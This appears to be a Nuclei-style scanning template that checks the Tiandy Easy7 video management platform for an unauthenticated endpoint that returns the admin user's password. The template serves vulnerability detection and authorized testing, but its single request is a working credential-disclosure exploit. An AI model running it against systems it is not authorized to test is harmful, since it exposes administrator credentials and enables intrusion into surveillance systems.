id: Tiandy-Easy7-queryPassword-fileread
info:
  name: Tiandy-Easy7-queryPassword-fileread
  author: Easy7
  severity: high
  tags: Information disclosure

http:
  - raw:
      - |
        GET /Easy7/rest/user/queryPassword?userName=admin HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"content":"'
          - '"ret":0'
        condition: and